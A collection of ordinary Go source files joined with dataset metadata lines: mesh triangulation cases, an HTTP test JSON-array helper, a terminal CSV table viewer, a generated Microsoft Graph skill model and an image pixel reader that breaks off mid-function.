return apply(k, mirrorZ(rotateTrisCounterClockwiseZ(v2v)), g0357)
case g2 | g3 | g4:
return apply(k, v2v, g234)
case g0 | g1 | g5 | g6 | g7: // (inverse = g234 = case g2 | g3 | g4:)
return apply(k, v2v, flipNormals(g234))
case g0 | g6 | g7: // (inverse = g12345 = case g1 | g2 | g3 | g4 | g5:)
return apply(k, mirrorZ(v2v), flipNormals(g234))
case g1 | g2 | g3 | g4 | g5: // (inverse = g067 = case g0 | g6 | g7:)
return apply(k, mirrorZ(v2v), g234)
case g1 | g6 | g7: // (inverse = g02345 = case g0 | g2 | g3 | g4 | g5:)
return apply(k, mirrorX(v2v), flipNormals(g234))
case g0 | g2 | g3 | g4 | g5: // (inverse = g167 = case g1 | g6 | g7:)
return apply(k, mirrorX(v2v), g234)
case g0 | g1 | g6: // (inverse = g23457 = case g2 | g3 | g4 | g5 | g7:)
return apply(k, rotateTris180Z(v2v), g234)
case g2 | g3 | g4 | g5 | g7: // (inverse = g016 = case g0 | g1 | g6:)
return apply(k, rotateTris180Z(v2v), flipNormals(g234))
case g0 | g1 | g7: // (inverse = g23456 = case g2 | g3 | g4 | g5 | g6:)
return apply(k, rotateTris180Z(mirrorX(v2v)), flipNormals(g234))
case g2 | g3 | g4 | g5 | g6: // (inverse = g017 = case g0 | g1 | g7:)
return apply(k, rotateTris180Z(mirrorX(v2v)), g234)
case g2 | g4 | g5: // (inverse = g01367 = case g0 | g1 | g3 | g6 | g7:)
return apply(k, mirrorZ(rotateTris180Z(v2v)), flipNormals(g234))
case g0 | g1 | g3 | g6 | g7: // (inverse = g245 = case g2 | g4 | g5:)
return apply(k, mirrorZ(rotateTris180Z(v2v)), g234)
case g2 | g3 | g5: // (inverse = g01467 = case g0 | g1 | g4 | g6 | g7:)
return apply(k, rotateTris180Z(mirrorX(rotateTris180Z(v2v))), flipNormals(g234))
case g0 | g1 | g4 | g6 | g7: // (inverse = g235 = case g2 | g3 | g5:)
return apply(k, rotateTris180Z(mirrorX(rotateTris180Z(v2v))), g234)
case g0 | g1 | g6 | g7:
return apply(k, v2v, g0167)
case g2 | g3 | g4 | g5: // (inverse = g0167 = case g0 | g1 | g6 | g7:)
return apply(k, v2v, flipNormals(g0167))
case g0 | g1 | g5 | g6:
return apply(k, v2v, g0156)
case g0 | g3 | g6 | g7:
return apply(k, mirrorX(rotateTrisCounterClockwiseZ(v2v)), flipNormals(g0156))
case g2 | g3 | g4 | g7:
return apply(k, rotateTris180Z(v2v), g0156)
case g0 | g4 | g5 | g6:
return apply(k, rotateTrisCounterClockwiseY(mirrorX(v2v)), flipNormals(g0156))
case g3 | g4 | g5 | g7:
return apply(k, rotateTrisCounterClockwiseY(mirrorX(rotateTrisCounterClockwiseZ(v2v))), flipNormals(g0156))
case g0 | g1 | g2 | g6: // (inverse = g3457 = case g3 | g4 | g5 | g7:)
return apply(k, rotateTrisCounterClockwiseY(mirrorX(rotateTrisCounterClockwiseZ(v2v))), g0156)
case g2 | g3 | g5 | g6:
return apply(k, mirrorX(rotateTris180Z(v2v)), flipNormals(g0156))
case g0 | g3 | g4 | g5: // (inverse = g1267 = case g1 | g2 | g6 | g7:)
return apply(k, rotateTrisCounterClockwiseZ(v2v), g0156)
case g1 | g2 | g6 | g7: // (inverse = g0345 = case g0 | g3 | g4 | g5:)
return apply(k, rotateTrisCounterClockwiseZ(v2v), flipNormals(g0156))
case g0 | g1 | g4 | g7: // (inverse = g2356 = case g2 | g3 | g5 | g6:)
return apply(k, mirrorX(rotateTris180Z(v2v)), g0156)
case g1 | g2 | g4 | g5: // (inverse = g0367 = case g0 | g3 | g6 | g7:)
return apply(k, mirrorX(rotateTrisCounterClockwiseZ(v2v)), g0156)
case g1 | g4 | g5 | g7: // (inverse = g0236 = case g0 | g2 | g3 | g6:)
return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), g0156)
case g0 | g2 | g3 | g6:
return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), flipNormals(g0156))
case g0 | g4 | g6 | g7: // (inverse = g1235 = case g1 | g2 | g3 | g5:)
return apply(k, rotateTris180Z(rotateTrisClockwiseX(v2v)), g0156)
case g1 | g2 | g3 | g5:
return apply(k, rotateTris180Z(rotateTrisClockwiseX(v2v)), flipNormals(g0156))
case g2 | g4 | g5 | g6: // (inverse = g0137 = case g0 | g1 | g3 | g7:)
return apply(k, rotateTrisClockwiseZ(rotateTrisClockwiseX(v2v)), g0156)
case g0 | g1 | g3 | g7: // (inverse = g2456 = case g2 | g4 | g5 | g6:)
return apply(k, rotateTrisClockwiseZ(rotateTrisClockwiseX(v2v)), flipNormals(g0156))
case g0 | g2 | g3 | g4: // (inverse = g1567 = case g1 | g5 | g6 | g7:)
return apply(k, rotateTrisCounterClockwiseY(mirrorX(rotateTrisCounterClockwiseZ(rotateTris180Z(v2v)))), g0156) // could be simplified.
case g1 | g5 | g6 | g7: // (inverse = g0234 = case g0 | g2 | g3 | g4:)
return apply(k, rotateTrisCounterClockwiseY(mirrorX(rotateTrisCounterClockwiseZ(rotateTris180Z(v2v)))), flipNormals(g0156))
case g2 | g4 | g5 | g7:
return apply(k, v2v, g2457)
case g1 | g2 | g4 | g6 | g7:
return apply(k, v2v, g12467)
case g0 | g2 | g4 | g5 | g6 | g7:
return apply(k, v2v, g024567)
case g1 | g3 | g4 | g5 | g6 | g7:
return apply(k, rotateTrisClockwiseZ(v2v), g024567)
case g1 | g2 | g3 | g4 | g5 | g6:
return apply(k, rotateTrisClockwiseY(v2v), g024567)
case g1 | g2 | g3 | g4 | g6 | g7:
return apply(k, rotateTrisCounterClockwiseX(v2v), g024567)
case g0 | g2 | g3 | g4 | g5 | g7:
return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), g024567)
case g0 | g2 | g3 | g5 | g6 | g7:
return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v)), g024567)
case g0 | g1 | g3 | g4 | g6 | g7:
return apply(k, rotateTrisCounterClockwiseY(v2v), g024567)
case g0 | g1 | g2 | g5 | g6 | g7:
return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), g024567)
case g1 | g3 | g4 | g5 | g6:
return apply(k, v2v, g13456)
case g0 | g2 | g4 | g5 | g7:
return apply(k, rotateTrisCounterClockwiseZ(v2v), g13456)
default:
log.Printf("grid2tris: k=%v: unhandled:\n%v", k, n)
}
return nil
}
// TriangleLess provides a Less function for sort.Slice.
func TriangleLess(t []*gl.Triangle) func(a, b int) bool {
return func(a, b int) bool {
if t[a].V1.Position.Z < t[b].V1.Position.Z {
return true
}
if t[a].V1.Position.Z > t[b].V1.Position.Z {
return false
}
if t[a].V1.Position.Y < t[b].V1.Position.Y {
return true
}
if t[a].V1.Position.Y > t[b].V1.Position.Y {
return false
}
if t[a].V1.Position.X < t[b].V1.Position.X {
return true
}
if t[a].V1.Position.X > t[b].V1.Position.X {
return false
}
if t[a].V2.Position.Z < t[b].V2.Position.Z {
return true
}
if t[a].V2.Position.Z > t[b].V2.Position.Z {
return false
}
if t[a].V2.Position.Y < t[b].V2.Position.Y {
return true
}
if t[a].V2.Position.Y > t[b].V2.Position.Y {
return false
}
if t[a].V2.Position.X < t[b].V2.Position.X {
return true
}
if t[a].V2.Position.X > t[b].V2.Position.X {
return false
}
if t[a].V3.Position.Z < t[b].V3.Position.Z {
return true
}
if t[a].V3.Position.Z > t[b].V3.Position.Z {
return false
}
if t[a].V3.Position.Y < t[b].V3.Position.Y {
return true
}
if t[a].V3.Position.Y > t[b].V3.Position.Y {
return false
}
return t[a].V3.Position.X < t[b].V3.Position.X
}
}
func (n neighborBitMap) String() string {
test := "g"
invTest := "g"
var result []string
var invResult []string
if n&g0 != 0 {
result = append(result, "g0")
test += "0"
} else {
invResult = append(invResult, "g0")
invTest += "0"
}
if n&g1 != 0 {
result = append(result, "g1")
test += "1"
} else {
invResult = append(invResult, "g1")
invTest += "1"
}
if n&g2 != 0 {
result = append(result, "g2")
test += "2"
} else {
invResult = append(invResult, "g2")
invTest += "2"
}
if n&g3 != 0 {
result = append(result, "g3")
test += "3"
} else {
invResult = append(invResult, "g3")
invTest += "3"
}
if n&g4 != 0 {
result = append(result, "g4")
test += "4"
} else {
invResult = append(invResult, "g4")
invTest += "4"
}
if n&g5 != 0 {
result = append(result, "g5")
test += "5"
} else {
invResult = append(invResult, "g5")
invTest += "5"
}
if n&g6 != 0 {
result = append(result, "g6")
test += "6"
} else {
invResult = append(invResult, "g6")
invTest += "6"
}
if n&g7 != 0 {
result = append(result, "g7")
test += "7"
} else {
invResult = append(invResult, "g7")
invTest += "7"
}
if len(result) == 0 {
return fmt.Sprintf("%v=%#x=*empty*", int(n), int(n))
}
return fmt.Sprintf("%v = case %v: (inverse = %v = case %v:)", test, strings.Join(result, " | "), invTest, strings.Join(invResult, " | "))
} | binvox/manifold.go | 0.662906 | 0.533944 | manifold.go | starcoder |
package httpexpect
import (
"fmt"
)
type JSONArrayType = []interface{}
type JSONArray struct {
expectation *Expectation
path string
value []interface{}
}
func (a *JSONArray) Len() *JSONNumber {
return &JSONNumber{
expectation: a.expectation,
path: fmt.Sprintf("%s.$len", a.path),
value: float64(len(a.value)),
}
}
func (a *JSONArray) Number(idx int) *JSONNumber {
if idx < len(a.value) {
if number, ok := a.value[idx].(float64); ok {
return &JSONNumber{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: number,
}
}
a.expectation.fatalf(`element at %d is not a number`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) String(idx int) *JSONString {
if idx < len(a.value) {
if str, ok := a.value[idx].(string); ok {
return &JSONString{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: str,
}
}
a.expectation.fatalf(`element at %d is not a string`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) Bool(idx int) *JSONBool {
if idx < len(a.value) {
if b, ok := a.value[idx].(bool); ok {
return &JSONBool{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: b,
}
}
a.expectation.fatalf(`element at %d is not a bool`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) Array(idx int) *JSONArray {
if idx < len(a.value) {
if array, ok := a.value[idx].(JSONArrayType); ok {
return &JSONArray{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: array,
}
}
a.expectation.fatalf(`element at %d is not an array`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) Object(idx int) *JSONObject {
if idx < len(a.value) {
if obj, ok := a.value[idx].(JSONObjectType); ok {
return &JSONObject{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: obj,
}
}
a.expectation.fatalf(`element at %d is not an object`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) Null(idx int) {
if idx < len(a.value) {
if a.value[idx] != nil {
a.expectation.fatalf(`element at %d is not a null`, idx)
return
}
return
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
} | httpexpect/json_array.go | 0.620507 | 0.542742 | json_array.go | starcoder |
package civ
import (
"fmt"
"strconv"
)
type Table struct {
header Row
// Maximum length of each columns data including both header
// and contents
maxLen []int
// A list of column number that is disabled to display
disabledCols []int
// Table contents excluding header
contents []Row
// View setting, starting from 0
offsetCol int
offsetRow int
outputStdout bool
}
type Row struct {
cols []Cell
hasMatched bool
isVisible bool
}
type Cell struct {
data string
matchBegin int
matchEnd int
width int // formatted size, available on only header
}
func NewTable(indata [][]string, dummyHeader bool) *Table {
t := &Table{
offsetCol: 0,
offsetRow: 0,
}
nCols := len(indata[0])
// Load header data
t.maxLen = make([]int, nCols)
for i, cell := range indata[0] {
c := Cell{
matchBegin: -1,
matchEnd: -1,
}
if dummyHeader {
// make dummy header
c.data = "col_" + strconv.Itoa(i)
t.header.cols = append(t.header.cols, c)
} else {
c.data = cell
t.header.cols = append(t.header.cols, c)
}
// initialize the maximum lenght of column by
// the header data
t.maxLen[i] = len(cell)
}
// Load table data
csvdata := indata[1:]
if dummyHeader {
// If using dummy header, csv data starts from indata[0]
csvdata = indata
}
for _, row := range csvdata {
var r Row
r.isVisible = true
for i, cell := range row {
c := &Cell{
data: cell,
matchBegin: -1,
matchEnd: -1,
}
r.cols = append(r.cols, *c)
if t.maxLen[i] < len(cell) {
t.maxLen[i] = len(cell)
}
}
t.contents = append(t.contents, r)
}
return t
}
// Return true and position if the given name is in col names
func (t *Table) FindColName(name string) (int, bool) {
for i, c := range t.header.cols {
if c.data == name {
return i, true
}
}
return -1, false
}
func (t *Table) NEnabledCols() int {
return len(t.header.cols) - len(t.disabledCols)
}
func (t *Table) IsColEnabled(colNum int) bool {
for _, n := range t.disabledCols {
if n == colNum {
return false
}
}
return true
}
// Add the idx'th column to disabled column list.
// That is, make it invisible
func (t *Table) AddDisabledCol(idx int) {
t.disabledCols = append(t.disabledCols, idx)
}
// Remove the idx'th column from disabled column list.
// That is, make it visible
func (t *Table) RemoveDisabledCol(idx int) {
res := []int{}
for _, c := range t.disabledCols {
if c != idx {
res = append(res, c)
}
}
t.disabledCols = res
}
func (t *Table) SetRowVisibility(rowIdx int, visible bool) {
t.contents[rowIdx].isVisible = visible
}
func (t *Table) SetMatched(r int, c int, b int, e int) {
t.contents[r].cols[c].matchBegin = b
t.contents[r].cols[c].matchEnd = e
}
func (t *Table) ResetDisabledCol() {
t.disabledCols = []int{}
}
func (t *Table) ResetVisibility() {
for i := 0; i < len(t.contents); i++ {
t.contents[i].isVisible = true
}
}
// Return the total size of visible cols. Note that c.width is the size
// of formatted cell, i.e. includes padding.
func (t *Table) computeWidth() (width int) {
width = 0
for i, c := range t.header.cols {
// Skip until offset
if i < t.offsetCol {
continue
}
// Skip if this col is disabled
if !t.IsColEnabled(i) {
continue
}
width += c.width
}
return width
}
// Return the total size of visible rows.
func (t *Table) computeHeight() (height int) {
height = 0
for i, r := range t.contents {
// Skip until offset
if i < t.offsetRow {
continue
}
if !r.isVisible {
continue
}
height++
}
// always include both header and line
return height + 2
}
// 0: up, 1: right, 2:down, 3: left
func (t *Table) isMovable(direction int) bool {
maxX, maxY := GetMaxXY()
x := t.computeWidth()
y := t.computeHeight()
if x >= maxX && direction == 1 {
// Movable to right and want to move right
return true
} else if t.offsetCol > 0 && direction == 3 {
// Viewing right part and want to move left
return true
} else if y > maxY && direction == 2 {
// Movable to down ana want ot move down
return true
} else if t.offsetRow > 0 && direction == 0 {
// Viewing bottom part and want to move up
return true
}
return false
}
func (t *Table) SetOffsetRow(r int) {
t.offsetRow = r
}
func (t *Table) MoveRight(move int) {
if !t.isMovable(1) {
return
}
t.offsetCol += move
if t.offsetCol > len(t.header.cols) {
t.offsetRow = len(t.header.cols)
}
}
func (t *Table) MoveLeft(move int) {
if !t.isMovable(3) {
return
}
t.offsetCol -= move
if t.offsetCol < 0 {
t.offsetCol = 0
}
}
func (t *Table) MoveUp(move int) {
if !t.isMovable(0) {
return
}
// Skip invisible rows
for i := t.offsetRow; !t.contents[i].isVisible && i > 0; i-- {
if !t.contents[i].isVisible {
move++
}
}
t.offsetRow -= move
if t.offsetRow < 0 {
t.offsetRow = 0
}
}
func (t *Table) MoveDown(move int) {
if !t.isMovable(2) {
return
}
// Skip invisible rows
for i := t.offsetRow; !t.contents[i].isVisible && i < len(t.contents); i++ {
if !t.contents[i].isVisible {
move++
}
}
t.offsetRow += move
if t.offsetRow > len(t.contents) {
t.offsetRow = len(t.contents)
}
}
func (t *Table) Debugdump() {
fmt.Println("---- Header ----")
for _, cell := range t.header.cols {
fmt.Print(cell.data, " ")
}
fmt.Println("")
fmt.Println("---- Contents -----------")
for _, row := range t.contents {
for _, cell := range row.cols {
fmt.Print(cell.data, " ")
}
fmt.Println("")
}
fmt.Println("maxLen: ", t.maxLen)
} | table.go | 0.673406 | 0.41739 | table.go | starcoder |
package models
import (
i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91 "github.com/microsoft/kiota-abstractions-go/serialization"
)
// SkillProficiency
type SkillProficiency struct {
ItemFacet
// Contains categories a user has associated with the skill (for example, personal, professional, hobby).
categories []string
// Contains experience scenario tags a user has associated with the interest. Allowed values in the collection are: askMeAbout, ableToMentor, wantsToLearn, wantsToImprove.
collaborationTags []string
// Contains a friendly name for the skill.
displayName *string
// Detail of the users proficiency with this skill. Possible values are: elementary, limitedWorking, generalProfessional, advancedProfessional, expert, unknownFutureValue.
proficiency *SkillProficiencyLevel
// The thumbnailUrl property
thumbnailUrl *string
// Contains a link to an information source about the skill.
webUrl *string
}
// NewSkillProficiency instantiates a new skillProficiency and sets the default values.
func NewSkillProficiency()(*SkillProficiency) {
m := &SkillProficiency{
ItemFacet: *NewItemFacet(),
}
return m
}
// CreateSkillProficiencyFromDiscriminatorValue creates a new instance of the appropriate class based on discriminator value
func CreateSkillProficiencyFromDiscriminatorValue(parseNode i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.Parsable, error) {
return NewSkillProficiency(), nil
}
// GetCategories gets the categories property value. Contains categories a user has associated with the skill (for example, personal, professional, hobby).
func (m *SkillProficiency) GetCategories()([]string) {
if m == nil {
return nil
} else {
return m.categories
}
}
// GetCollaborationTags gets the collaborationTags property value. Contains experience scenario tags a user has associated with the interest. Allowed values in the collection are: askMeAbout, ableToMentor, wantsToLearn, wantsToImprove.
func (m *SkillProficiency) GetCollaborationTags()([]string) {
if m == nil {
return nil
} else {
return m.collaborationTags
}
}
// GetDisplayName gets the displayName property value. Contains a friendly name for the skill.
func (m *SkillProficiency) GetDisplayName()(*string) {
if m == nil {
return nil
} else {
return m.displayName
}
}
// GetFieldDeserializers the deserialization information for the current model
func (m *SkillProficiency) GetFieldDeserializers()(map[string]func(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(error)) {
res := m.ItemFacet.GetFieldDeserializers()
res["categories"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
val, err := n.GetCollectionOfPrimitiveValues("string")
if err != nil {
return err
}
if val != nil {
res := make([]string, len(val))
for i, v := range val {
res[i] = *(v.(*string))
}
m.SetCategories(res)
}
return nil
}
res["collaborationTags"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
val, err := n.GetCollectionOfPrimitiveValues("string")
if err != nil {
return err
}
if val != nil {
res := make([]string, len(val))
for i, v := range val {
res[i] = *(v.(*string))
}
m.SetCollaborationTags(res)
}
return nil
}
res["displayName"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
val, err := n.GetStringValue()
if err != nil {
return err
}
if val != nil {
m.SetDisplayName(val)
}
return nil
}
res["proficiency"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
val, err := n.GetEnumValue(ParseSkillProficiencyLevel)
if err != nil {
return err
}
if val != nil {
m.SetProficiency(val.(*SkillProficiencyLevel))
}
return nil
}
res["thumbnailUrl"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
val, err := n.GetStringValue()
if err != nil {
return err
}
if val != nil {
m.SetThumbnailUrl(val)
}
return nil
}
res["webUrl"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
val, err := n.GetStringValue()
if err != nil {
return err
}
if val != nil {
m.SetWebUrl(val)
}
return nil
}
return res
}
// GetProficiency gets the proficiency property value. Detail of the users proficiency with this skill. Possible values are: elementary, limitedWorking, generalProfessional, advancedProfessional, expert, unknownFutureValue.
func (m *SkillProficiency) GetProficiency()(*SkillProficiencyLevel) {
if m == nil {
return nil
} else {
return m.proficiency
}
}
// GetThumbnailUrl gets the thumbnailUrl property value. The thumbnailUrl property
func (m *SkillProficiency) GetThumbnailUrl()(*string) {
if m == nil {
return nil
} else {
return m.thumbnailUrl
}
}
// GetWebUrl gets the webUrl property value. Contains a link to an information source about the skill.
func (m *SkillProficiency) GetWebUrl()(*string) {
if m == nil {
return nil
} else {
return m.webUrl
}
}
// Serialize serializes information the current object
func (m *SkillProficiency) Serialize(writer i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.SerializationWriter)(error) {
err := m.ItemFacet.Serialize(writer)
if err != nil {
return err
}
if m.GetCategories() != nil {
err = writer.WriteCollectionOfStringValues("categories", m.GetCategories())
if err != nil {
return err
}
}
if m.GetCollaborationTags() != nil {
err = writer.WriteCollectionOfStringValues("collaborationTags", m.GetCollaborationTags())
if err != nil {
return err
}
}
{
err = writer.WriteStringValue("displayName", m.GetDisplayName())
if err != nil {
return err
}
}
if m.GetProficiency() != nil {
cast := (*m.GetProficiency()).String()
err = writer.WriteStringValue("proficiency", &cast)
if err != nil {
return err
}
}
{
err = writer.WriteStringValue("thumbnailUrl", m.GetThumbnailUrl())
if err != nil {
return err
}
}
{
err = writer.WriteStringValue("webUrl", m.GetWebUrl())
if err != nil {
return err
}
}
return nil
}
// SetCategories sets the categories property value. Contains categories a user has associated with the skill (for example, personal, professional, hobby).
func (m *SkillProficiency) SetCategories(value []string)() {
if m != nil {
m.categories = value
}
}
// SetCollaborationTags sets the collaborationTags property value. Contains experience scenario tags a user has associated with the interest. Allowed values in the collection are: askMeAbout, ableToMentor, wantsToLearn, wantsToImprove.
func (m *SkillProficiency) SetCollaborationTags(value []string)() {
if m != nil {
m.collaborationTags = value
}
}
// SetDisplayName sets the displayName property value. Contains a friendly name for the skill.
func (m *SkillProficiency) SetDisplayName(value *string)() {
if m != nil {
m.displayName = value
}
}
// SetProficiency sets the proficiency property value. Detail of the users proficiency with this skill. Possible values are: elementary, limitedWorking, generalProfessional, advancedProfessional, expert, unknownFutureValue.
func (m *SkillProficiency) SetProficiency(value *SkillProficiencyLevel)() {
if m != nil {
m.proficiency = value
}
}
// SetThumbnailUrl sets the thumbnailUrl property value. The thumbnailUrl property
func (m *SkillProficiency) SetThumbnailUrl(value *string)() {
if m != nil {
m.thumbnailUrl = value
}
}
// SetWebUrl sets the webUrl property value. Contains a link to an information source about the skill.
func (m *SkillProficiency) SetWebUrl(value *string)() {
if m != nil {
m.webUrl = value
}
} | models/skill_proficiency.go | 0.590543 | 0.414721 | skill_proficiency.go | starcoder |
package gift
import (
"image"
"image/color"
"image/draw"
)
type pixel struct {
r, g, b, a float32
}
type imageType int
const (
itGeneric imageType = iota
itNRGBA
itNRGBA64
itRGBA
itRGBA64
itYCbCr
itGray
itGray16
itPaletted
)
type pixelGetter struct {
it imageType
bounds image.Rectangle
image image.Image
nrgba *image.NRGBA
nrgba64 *image.NRGBA64
rgba *image.RGBA
rgba64 *image.RGBA64
gray *image.Gray
gray16 *image.Gray16
ycbcr *image.YCbCr
paletted *image.Paletted
palette []pixel
}
func newPixelGetter(img image.Image) *pixelGetter {
switch img := img.(type) {
case *image.NRGBA:
return &pixelGetter{
it: itNRGBA,
bounds: img.Bounds(),
nrgba: img,
}
case *image.NRGBA64:
return &pixelGetter{
it: itNRGBA64,
bounds: img.Bounds(),
nrgba64: img,
}
case *image.RGBA:
return &pixelGetter{
it: itRGBA,
bounds: img.Bounds(),
rgba: img,
}
case *image.RGBA64:
return &pixelGetter{
it: itRGBA64,
bounds: img.Bounds(),
rgba64: img,
}
case *image.Gray:
return &pixelGetter{
it: itGray,
bounds: img.Bounds(),
gray: img,
}
case *image.Gray16:
return &pixelGetter{
it: itGray16,
bounds: img.Bounds(),
gray16: img,
}
case *image.YCbCr:
return &pixelGetter{
it: itYCbCr,
bounds: img.Bounds(),
ycbcr: img,
}
case *image.Paletted:
return &pixelGetter{
it: itPaletted,
bounds: img.Bounds(),
paletted: img,
palette: convertPalette(img.Palette),
}
default:
return &pixelGetter{
it: itGeneric,
bounds: img.Bounds(),
image: img,
}
}
}
const (
qf8 = 1.0 / 0xff
qf16 = 1.0 / 0xffff
epal = qf16 * qf16 / 2
)
func pixelFromColor(c color.Color) (px pixel) {
r16, g16, b16, a16 := c.RGBA()
switch a16 {
case 0:
px = pixel{0, 0, 0, 0}
case 0xffff:
r := float32(r16) * qf16
g := float32(g16) * qf16
b := float32(b16) * qf16
px = pixel{r, g, b, 1}
default:
q := float32(1) / float32(a16)
r := float32(r16) * q
g := float32(g16) * q
b := float32(b16) * q
a := float32(a16) * qf16
px = pixel{r, g, b, a}
}
return px
}
func convertPalette(p []color.Color) []pixel {
pal := make([]pixel, len(p))
for i := 0; i < len(p); i++ {
pal[i] = pixelFromColor(p[i])
}
return pal
}
func getPaletteIndex(pal []pixel, px pixel) int {
var k int
var dmin float32 = 4
for i, palpx := range pal {
d := px.r - palpx.r
dcur := d * d
d = px.g - palpx.g
dcur += d * d
d = px.b - palpx.b
dcur += d * d
d = px.a - palpx.a
dcur += d * d
if dcur < epal {
return i
}
if dcur < dmin {
dmin = dcur
k = i
}
}
return k
}
func (p *pixelGetter) getPixel(x, y int) pixel {
switch p.it {
case itNRGBA:
i := p.nrgba.PixOffset(x, y)
r := float32(p.nrgba.Pix[i+0]) * qf8
g := float32(p.nrgba.Pix[i+1]) * qf8
b := float32(p.nrgba.Pix[i+2]) * qf8
a := float32(p.nrgba.Pix[i+3]) * qf8
return pixel{r, g, b, a}
case itNRGBA64:
i := p.nrgba64.PixOffset(x, y)
r := float32(uint16(p.nrgba64.Pix[i+0])<<8|uint16(p.nrgba64.Pix[i+1])) * qf16
g := float32(uint16(p.nrgba64.Pix[i+2])<<8|uint16(p.nrgba64.Pix[i+3])) * qf16
b := float32(uint16(p.nrgba64.Pix[i+4])<<8|uint16(p.nrgba64.Pix[i+5])) * qf16
a := float32(uint16(p.nrgba64.Pix[i+6])<<8|uint16(p.nrgba64.Pix[i+7])) * qf16
return pixel{r, g, b, a}
case itRGBA:
i := p.rgba.PixOffset(x, y)
a8 := p.rgba.Pix[i+3]
switch a8 {
case 0xff:
r := float32(p.rgba.Pix[i+0]) * qf8
g := float32(p.rgba.Pix[i+1]) * qf8
b := float32(p.rgba.Pix[i+2]) * qf8
return pixel{r, g, b, 1}
case 0:
return pixel{0, 0, 0, 0}
default:
q := float32(1) / float32(a8)
r := float32(p.rgba.Pix[i+0]) * q
g := float32(p.rgba.Pix[i+1]) * q
b := float32(p.rgba.Pix[i+2]) * q
a := float32(a8) * qf8
return pixel{r, g, b, a}
}
case itRGBA64:
i := p.rgba64.PixOffset(x, y)
a16 := uint16(p.rgba64.Pix[i+6])<<8 | uint16(p.rgba64.Pix[i+7])
switch a16 {
case 0xffff:
r := float32(uint16(p.rgba64.Pix[i+0])<<8|uint16(p.rgba64.Pix[i+1])) * qf16
g := float32(uint16(p.rgba64.Pix[i+2])<<8|uint16(p.rgba64.Pix[i+3])) * qf16
b := float32(uint16(p.rgba64.Pix[i+4])<<8|uint16(p.rgba64.Pix[i+5])) * qf16
return pixel{r, g, b, 1}
case 0:
return pixel{0, 0, 0, 0}
default:
q := float32(1) / float32(a16)
r := float32(uint16(p.rgba64.Pix[i+0])<<8|uint16(p.rgba64.Pix[i+1])) * q
g := float32(uint16(p.rgba64.Pix[i+2])<<8|uint16(p.rgba64.Pix[i+3])) * q
b := float32(uint16(p.rgba64.Pix[i+4])<<8|uint16(p.rgba64.Pix[i+5])) * q
a := float32(a16) * qf16
return pixel{r, g, b, a}
}
case itGray:
i := p.gray.PixOffset(x, y)
v := float32(p.gray.Pix[i]) * qf8
return pixel{v, v, v, 1}
case itGray16:
i := p.gray16.PixOffset(x, y)
v := float32(uint16(p.gray16.Pix[i+0])<<8|uint16(p.gray16.Pix[i+1])) * qf16
return pixel{v, v, v, 1}
case itYCbCr:
iy := (y-p.ycbcr.Rect.Min.Y)*p.ycbcr.YStride + (x - p.ycbcr.Rect.Min.X)
var ic int
switch p.ycbcr.SubsampleRatio {
case image.YCbCrSubsampleRatio444:
ic = (y-p.ycbcr.Rect.Min.Y)*p.ycbcr.CStride + (x - p.ycbcr.Rect.Min.X)
case image.YCbCrSubsampleRatio422:
ic = (y-p.ycbcr.Rect.Min.Y)*p.ycbcr.CStride + (x/2 - p.ycbcr.Rect.Min.X/2)
case image.YCbCrSubsampleRatio420:
ic = (y/2-p.ycbcr.Rect.Min.Y/2)*p.ycbcr.CStride + (x/2 - p.ycbcr.Rect.Min.X/2)
case image.YCbCrSubsampleRatio440:
ic = (y/2-p.ycbcr.Rect.Min.Y/2)*p.ycbcr.CStride + (x - p.ycbcr.Rect.Min.X)
default:
ic = p.ycbcr.COffset(x, y)
}
const (
max = 255 * 1e5
inv = 1.0 / max
)
y1 := int32(p.ycbcr.Y[iy]) * 1e5
cb1 := int32(p.ycbcr.Cb[ic]) - 128
cr1 := int32(p.ycbcr.Cr[ic]) - 128
r1 := y1 + 140200*cr1
g1 := y1 - 34414*cb1 - 71414*cr1
b1 := y1 + 177200*cb1
r := float32(clampi32(r1, 0, max)) * inv
g := float32(clampi32(g1, 0, max)) * inv
b := float32(clampi32(b1, 0, max)) * inv
return pixel{r, g, b, 1}
case itPaletted:
i := p.paletted.PixOffset(x, y)
k := p.paletted.Pix[i]
return p.palette[k]
}
